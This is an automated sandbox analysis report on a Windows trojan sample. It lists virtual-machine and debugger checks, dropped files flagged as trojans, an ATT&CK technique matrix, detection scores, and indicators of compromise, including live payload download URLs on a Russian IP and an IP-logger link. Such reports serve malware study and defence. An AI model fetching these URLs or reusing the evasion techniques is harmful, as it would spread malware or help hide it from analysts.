Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2954051977.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1790805562.0000000000851000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_0041117B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_0041B919 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_00414C8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_007AAA23 push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_0218BB80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_0217092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_02184EF6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_02170D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_00402C60 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe Code function: 0_2_0040D949 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0041117B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041117B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040CD96 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD96
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040D7B5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040D7B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217DA1C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0217DA1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217DBB0 SetUnhandledExceptionFilter,0_2_0217DBB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_021813E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_021813E2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0217CFFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0217CFFD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040D9B3 cpuid 0_2_0040D9B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_00421135
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_00421180
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_0042121B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004212A6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_00419BF4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_004214F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0042161F
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00420E93
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_00421725
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_0041972F
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004217F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_02191A5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_0219139C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_021913E7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_02191886
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_02189996
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_0219198C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_02189E5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,0_2_02191760
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: EnumSystemLocalesW,0_2_02191482
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0219150D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeCode function: 0_2_0040DBE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040DBE5
Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 151 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 22 Software Packing | Cached Domain Credentials | 32 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | 50% | ReversingLabs |
SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | 37% | Virustotal |
SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | 60% | Virustotal |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | 1% | Virustotal |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Bunifu_UI_v1.5.3.dll | 1% | Virustotal |
C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Bunifu_UI_v1.5.3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe | 60% | Virustotal |
No Antivirus matches
No Antivirus matches
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://80.66.75.114/dll/key | false | | unknown
http://80.66.75.114/files/download | false | | unknown
http://80.66.75.114/soft/download | false | | unknown
http://80.66.75.114/name | false | | unknown
http://80.66.75.114/dll/download | false | | unknown
http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB | false | | unknown
                        https://iplogger.org/1Pz8p7SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098391293.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095635491.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2102473420.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098475766.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2101179469.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2099803933.0000000003061000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalseunknown
                        http://80.66.75.114/files/downloadtem32SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown
IP | Domain | Country | ASN | ASN Name | Malicious
80.66.75.114 | unknown | Russian Federation | 20803 | RISS-ASRU | false
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1528791
                        Start date and time:2024-10-08 10:07:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:25
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                        Detection:MAL
                        Classification:mal100.evad.winEXE@9/48@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 22
                        • Number of non-executed functions: 160
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21
                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
80.66.75.114 | nRGKqzVQRt.exe | malicious | Unknown | 80.66.75.114/soft/download
80.66.75.114 | BDY5OFXpM9.exe | malicious | Unknown | 80.66.75.114/soft/download
80.66.75.114 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 80.66.75.114/soft/download
80.66.75.114 | univ.exe | malicious | Unknown | 80.66.75.114/soft/download
80.66.75.114 | univ.exe | malicious | Unknown | 80.66.75.114/soft/download
80.66.75.114 | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 80.66.75.114/dl?name=mixnine
80.66.75.114 | file.exe | malicious | Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz | 80.66.75.114/dl?name=mixnine.exe
80.66.75.114 | file.exe | malicious | Unknown | 80.66.75.114/soft/download
80.66.75.114 | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz | 80.66.75.114/soft/download
                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RISS-ASRU | nRGKqzVQRt.exe | malicious | Unknown | 80.66.75.114
RISS-ASRU | BDY5OFXpM9.exe | malicious | Unknown | 80.66.75.114
RISS-ASRU | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 80.66.75.114
RISS-ASRU | univ.exe | malicious | Unknown | 80.66.75.114
RISS-ASRU | univ.exe | malicious | Unknown | 80.66.75.114
RISS-ASRU | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 80.66.75.114
RISS-ASRU | file.exe | malicious | Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz | 80.66.75.114
RISS-ASRU | file.exe | malicious | Unknown | 80.66.75.114
RISS-ASRU | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz | 80.66.75.114
                        No context
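Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | nRGKqzVQRt.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | BDY5OFXpM9.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | univ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | univ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] | SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | nRGKqzVQRt.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | BDY5OFXpM9.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | univ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | univ.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe | malicious | Unknown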
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.8738392677818466
                                                            Encrypted:false
                                                            SSDEEP:96:jcqm/wdzmOGkmefsmmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BRTfa:j/d7GofHY056rgjuizuiFKZ24IO8a
                                                            MD5:411303F86D7BC5E2814E02CAF9077DE2
                                                            SHA1:3894CD4D85C329BF1D1A576214A74C880F140A1C
                                                            SHA-256:9DDD8CC21825E7487D6B287042C15E891ED9316075E7E0BA695EB78C096E0A0F
                                                            SHA-512:3DA4F219DE2E3837ADCBCFCD02997A554309C66E5FD6D4AC23F73500664D16848E2893A89C0F0E27A70FB9E38062182C3EA38831AE899FA599DE6FBDF1AAC2E9
                                                            Malicious:false
                                                            Reputation:low
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.923570848410821
                                                            Encrypted:false
                                                            SSDEEP:96:nqOm/wdzmOGkmeismmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BRTfR:ntd7GoiHY056rgjuRzuiFKZ24IO8a
                                                            MD5:A6A6823942AD4CDCD3B630294DE91A62
                                                            SHA1:AB175106EFB8F69B779B4C3B4FA879A35C0367EA
                                                            SHA-256:DB0514614A2F146C089849F72AC8023A459DAB91B529D9FF399FE6208B6F41FF
                                                            SHA-512:C8C64D05DACA0ECBC5E7BBD603C0CF1AFBEC559B244B19552348B439AF962D1B6BAA91B70B4E902C13A83030B8C2D570FEB47681B848D82A9BB6ADDFDE24C902
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.8739199790953603
                                                            Encrypted:false
                                                            SSDEEP:96:jvmVm/wdzmOGkmeismmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BRTS:gd7GoiHY056rgjuizuiFKZ24IO8a
                                                            MD5:62C91A2FA8229F2DDC9D6EE0C737F8DF
                                                            SHA1:370963BF64443538F47E60AFE6BE2133F8F6FDF8
                                                            SHA-256:DF60A8364D8351D0349CC757EA515DD10C02AD3267FA5A3488ED6955F98E2D00
                                                            SHA-512:346E9377CFFD30ABE36CD0DAB1E660B685EEADFAE2BBB9579CA6CDBEABB468FA7E478C55B4D782446FED8ABBA779FDAD779D23424535E5D9A4FC67EF90E095AF
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.8961390373245083
                                                            Encrypted:false
                                                            SSDEEP:96:nGVqPm/wdzmOGkmeVsmmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BR1:nBd7GoVHY056rgjuJzuiFKZ24IO8a
                                                            MD5:3CD5308E88B173A469F8E84528334C0C
                                                            SHA1:128734F4532C1F9700D5D1DBC23F2D53A0128067
                                                            SHA-256:5F87B81B39A68CCA453103638A01BDD0F911B3B8D53AC1A75162534A6C5C13D7
                                                            SHA-512:89C029B75BBA9649B97477144B30762304653ABAEB611785753F6F7906E471EF5CBB921AF7826D6D1CB48CB05779F43B568972820E23BA6BF3655D1277AEA0D6
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.8742429027510149
                                                            Encrypted:false
                                                            SSDEEP:96:sX/DqXom/wdzmOGkmeqsmmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8m:iDfd7GoqHY056rgjuizuiFKZ24IO8a
